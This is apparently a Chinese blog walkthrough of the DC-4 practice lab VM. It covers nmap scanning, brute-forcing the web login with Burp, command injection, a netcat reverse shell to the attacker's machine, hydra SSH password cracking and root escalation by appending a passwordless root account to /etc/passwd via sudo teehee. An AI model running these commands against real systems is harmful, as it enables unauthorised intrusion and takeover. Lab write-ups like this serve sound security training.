DC4靶机

123456
6
2025-06-24

用nmap扫内网存活主机

nmap -sn 192.168.32.0/24

微信截图_20250623170718

发现目标主机 192.168.32.139

扫描有哪些端口开放

nmap -sV -p- 192.168.32.139

微信截图_20250623170833

进入web页面,发现是个登录页面,尝试弱口令,用burp抓包发送到intruder模块,根据返回长度不同发现 admin/happy

微信截图_20250623171010

微信截图_20250623171025

微信截图_20250623171037

登录进去发现可以执行一些命令,burp抓包发到repeater模块,修改radio里面的值发现会被执行

使用nc反弹

kali里输 nc -lvnp 9001

burp里被执行的参数改成 nc 192.168.32.129 9001 -e /bin/sh

反弹成功

微信截图_20250623171849

在/home里找到三个用户文件夹

charles jim sam

在jim用户的backup目录下找到了一个old-password文件

微信截图_20250623172043

把文件内容复制成pass.txt,用hydra暴出ssh的密码

hydra -l jim -P pass.txt ssh://192.168.32.139

微信截图_20250623172214

发现密码是jibril04

ssh连接

ssh jim@192.168.32.139 -p 22

登录进来后查看用户权限sudo -l

发现没有sudo的权限

微信截图_20250623172757

在登录进来的时候提示有一封邮件在 Linux 系统中,邮件通常存储在 /var/mail 目录下.

微信截图_20250623172314

进入该目录发现目录下有jim用户的一封邮件邮件中有charles的密码

微信截图_20250623172502

登录charles用户查看权限

微信截图_20250623173539

发现teehee不需要密码可以有root权限,用teehee可以在文件中追加内容

使用:echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

微信截图_20250623174247

su admin登录进发现是root权限

动物装饰